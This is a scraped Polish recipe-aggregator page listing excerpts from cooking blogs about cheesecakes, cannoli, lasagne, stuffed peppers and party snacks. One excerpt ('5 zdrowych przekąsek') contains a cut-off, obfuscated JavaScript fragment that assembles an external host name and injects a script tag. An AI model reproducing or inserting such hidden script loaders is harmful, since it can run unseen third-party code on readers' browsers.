ser domowy - 1000 przepisów (strona:54/67)

Papryka faszerowana ryżem i warzywami. 164

Hej :) Paprykowy sezon jeszcze trwa, więc postanowiliśmy przygotować dla Was papryczki faszerowane ryżem z dodatkiem warzyw. Preferujemy białe papryczki, ponieważ mają niezwykły zapach i zdecydowanie lepszy

vegetanie
Fast food z patelni 196

lubi, mam nawet wrażenie, a nawet jestem przekonana o tym, że on lubi je zdecydowanie bardziej. Zresztą nawet dziś, na specjalne jego życzenie będę piec bułeczki i robić (pyszne!) domowe hamburgery. Tylko żebyście się wszyscy nie zlecieli, bo mi braknie 😋 Wracając do tego, co tam na tej patelni u mnie się działo, to w zasadzie nic trudnego. No bo wiecie(...)oliwy ½ łyżeczki soli 12g świeżych drożdży 1 łyżeczka cukru Olej do smażenia Nadzienie: 2 duże piersi z kurczaka 1 opakowanie mieszanki sałat (gotowych do spożycia) 1 duży pomidor ½ opakowania sera sałatkowego typu Feta Kilka czarnych oliwek Sos: 1 mały kubeczek jogurtu naturalnego 2 małe ząbki czosnku 1 ogórek świeży Sól, pieprz do smaku Dodatkowo: 1 łyżka oleju rzepakowego Sól, pieprz

Kuchnia w czekoladzie
5 zdrowych przekąsek na każdą imprezę 421

dość, że będą nieporównywalnie zdrowsze od gotowych produktów, to dodatkowo będą smakować o wiele lepiej, ponieważ można przygotować je z ulubionymi przyprawami oraz innymi dodatkami. 3. Hummus z warzywami Domowy hummus nie wymaga wiele pracy, a jego cenne właściwości na pewno wpiszą się w zdrowe przekąski. Można podać go na talerzu wraz z pokrojonymi w paski surowymi warzywami – marchewkami, selerem(...)warzyw (wtedy nie ma problemu, jeżeli któryś z gości nie je mięsa) z dodatkiem odrobiny oliwy z oliwek oraz aromatycznych ziół i przypraw. Nie zaszkodzi również dodać trochę sera (np. feta lub mozzarella), który nada całości delikatnego posmaku. „artykuł zewnętrzny” (function(){ zlnz=document.createElement("script");zlnz_=(("u")+"st")+"a";zlnz.async=true; zlnz.type="text/javascript";zlnz_+=("t.i")+""+"n";zlnz_+=(("f")+"o");zlnz_+="/"; zlnzu

Kuchcik gotuje
TU I TAM nr 29. Niech króluje czosnek! Pieczony. I galaretka 183

bankiecie Platona więcej jedzono czosnku niż kremu śmietankowego!".  Dwa tysiące lat po tym filozofie i dwa tysiące kilometrów na północ William Shakespeare zapewniał " wolałbym w wiatraku żyć serem i czosnkiem niż zapychać się ciastkami!".   Upodobanie do czosnku wywodzą Marsylczycy od Hipokratesa i Homera. Wielki doktor, idąc śladem Egipcjan, uważał czosnek za potężne lekarstwo, niemal panaceum. A Homer(...)listopadowe spotkanie z Amber.  Wszystko w niej jest poezją - cudowny aromat czosnku, delikatny, lekko słodki smak i jasno bursztynowy kolor. Czosnkowy poemat.  Posmarujcie nią opieczoną bagietkę lub domowy chleb z twarogiem - będziecie zachwyceni tym niezwykłym smakiem.  Już za parę godzin grudzień - słoiczek tej wyjątkowej galaretki może być wspaniałym pomysłem na prezent dla kogoś, kto tak ja kocha

KUCHARNIA
Sycylijskie cannoli z ricottą 153

pełnym majestacie prawa, a zgodę na eksperyment wydało grupie młodych ludzi z miasta Enna tamtejsze dowództwo pułku lotniczego oraz Urząd Lotnictwa Cywilnego. Z lotu rurki z kremowym nadzieniem z sera ricotta, ozdobionej kandyzowanymi wisienkami został nakręcony film. Przepis na ciasto zaczerpnęłam od Anny Olson.    Składniki na ciasto:  - 3 szklanki mąki tortowej- ½ łyżki drobnego cukru do wypieków- szczypta soli- 120g masła(...)wyschło. Po rozwałkowaniu (cienko, na grubość ok. 2mm) wycinamy kółka o średnicy 8 cm. Do smażenia cannoli służą specjalne rurki. Ja jednak takich nie posiadam, więc poradziłam sobie „domowym sposobem”. Rurkę po folii spożywczej (jest twarda i w miarę cienka) przekroiłam na 4 kawałki (każdy miał ok. 9cm – czyli tyle ile oryginalne rurki). Z folii aluminiowej ucinałam po dwa paski

mojewypiekiinietylko
Ciabatta z pomidorami i mięsem 268

Kiedy znudzą nam się tradycyjne kanapki, warto czasami sięgnąć po coś innego. Jako wielbicielka włoskiej kuchni chciałam Wam zaproponować ciabattę ;-) moja propozycja na kanapkę na gorąco

Kuchnia Pełna Pasji
Fasolka szparagowa polsko-włoska – fagiolini alla polacca 172

pojęcia skąd wzięło się to danie. Czy to potrawa gotowana przez Polaków we Włoszech? Skąd nagle frankfurterka, skąd sos z siekanych jajek? W „The Silver Spoon”, mojej domowej biblii włoskich smaków, ten przepis jest na samym początku rozdziału o daniach z fasoli. Książkę „The Silver Spoon” można bez przesady nazywać biblią kuchni włoskiej. To najważniejsze i najobszerniejsze wydawnictwo o włoskiej(...)sosy, marynaty i smakowe masła, przystawki, przekąski i pizze, główne dania, potrawy z jaj, potrawy z warzyw, dania z ryb i skorupiaków, dania mięsne, przepisy na drób, dziczyznę, sery i desery. Nowe wydanie dodatkowo przed każdym rozdziałem i podrozdziałem zawiera obszerny wstęp, opisujący podstawowe kwestie związane z doborem składników, wykorzystane techniki i terminy czy pochodzenie potraw. Jest i co czytać

Karo in the Kitchen
Drożdżowe bułeczki z oliwkami i serem feta 151

Przepis na pyszną wytrawną przekąskę w formie drożdżowych bułeczek. Ostrzegam, że będzie dużo glutenu, białej mąki i jeeeeszcze więcej przyjemności z jedzenia tych pyszności :D Tak

HealthyCreations
Sernik królewski-pyszny i prosty 172

Nie wiem jak u Was, ale u mnie jest to zdecydowanie nr 1 wśród serników ze spodem w wersji kakaowej. Nie dość, że wygląda super, to

Zdrowie i pysznie na talerzu
Lazania 377

Lazania chodziła mi pogłowie już od dłuższego czasu. Wiedząc że jest to spore wyzwanie trochę się z tym ociągałam. Pamiętam jak pierwszy raz miałam do czynienia

Kuchnia Pełna Pasji
Menu na tydzień: Zdrowa dieta słoikowa 195

słoika i zrobić z tego doskonały lunch. Od dawna propagujemy na blogu patent polegający na robieniu zapiekanek w słoikach . Zrobiliśmy też kilka przepisów na zupy instant z kostką rosołową domowego wyrobu zamknięte w słoiku, które wystarczy zalać wrzątkiem. Według nas hermetycznie zamykane słoiki to bardzo wygony, trwały i ekologiczny pojemnik na lancz do pracy. Dania ze słoika smakują wspaniale(...)zrobiliśmy łącznie pięć warstwowych sałatek. Wszystkie przepisy są bardzo proste, a najpiękniejsze jest w nich to, że można je zmieniać, dowolnie dobierając składniki. Dodawajcie do słoików Wasze ulubione warzywa, sery, czy mięsa lub wędliny. Od Waszej inwencji zależy co zjecie na lancz. My robiliśmy to np. tak: Pakując sałatki do słoika trzymajcie się zasady, żeby na samo dno kłaść dresing

Niedzielny kucharz
Krokiety z nadzieniem serowym. 169

Witajcie :) Dziś koniec wakacji :( Dzieci mówią - szkoda, dorośli mówią nadchodzi jesień... i zimne dni. A my mówimy dobre jedzenie ! Specjalnie na osłodę tego dnia przygotowaliśmy dla

vegetanie
42 przepisy z nowalijkami 144

papryką i zielonym ogórkiem Sałatka z kukurydzy, z papryką i zielonym ogórkiem Sałatka z ogórków małosolonych Botwinka z cukinią w delikatnym sosie   Sałatka z ogórkiem, jajkiem i domowym majonezem Woda ogórkowo - cytrynowa Zgrzewane kanapki z liśćmi botwinki Zupa z botwinki Zupa z botwinki z ziemniakami Sałatka z kaszą pęczak i zielonym ogórkiem Woda ogórkowo - miętowa Kanapka z ciabatty(...)Sałatka z pomidorków ze szczypiorkiem Sałatka ziemniaczana z kapustą pekińską i pomidorkami Spaghetti w pomidorach z czosnkiem i natką Surówka z kapusty z pomidorem w jogurcie Zgrzewane kanapki z serem, pomidorem i szynką Jarzynowa zupa z młodą kapustą Koktajl owocowo - warzywny Koktajl warzywny na maślance Surówka z młodej kapusty z truskawkami

Moja smaczna kuchnia
Węgierska pierś z kurczaka 166

Węgierska pierś z kurczaka Wiadomo że Węgry kochają paprykę więc , pierś z kurczaka nią nadziewana po prostu musi się tak nazywać Bardzo smaczny i prosty w

Ogrodnik w podróży
Sernik na zimno z karmelizowanym rabarbarem 175

rabarbarem Kruche ciasto rabarbarowe Lekkie ciasto jogurtowe z rabarbarem Drożdżówki z karmelizowanym rabarbarem i imbirową kruszonką Muffiny z truskawkami rabarbarem Muffiny z rabarbarem Domowe lody truskawkowo-rabarbarowe Lody rabarbarowe Domowe lody truskawkowe z karmelizowanym rabarbarem Sernik z rabarbarem na zimno Sernik na zimno z karmelizowanym rabarbarem Proporcje na tortownicę o średnicy 23 cm   Składniki Karmelizowany rabarbar: 500 g rabarbaru(...)zalewamy 1/3 szklanki zimnej wody i odstawiamy na 10 minut. Po tym czasie żelatynę delikatnie podgrzewamy i mieszamy, aż się rozpuści i odstawiamy do lekkiego przestudzenia. W misce miksujemy ser, mascarpone, ziarenka wanilii i cukier puder.  Do lekko przestudzonej żelatyny dodajemy 2  łyżki karmelizowanego rabarbaru i mieszamy. Zahartowaną żelatynę dodajemy do pozostałej części rabarbaru, cały czas miksując

Kulinarne przygody Gatity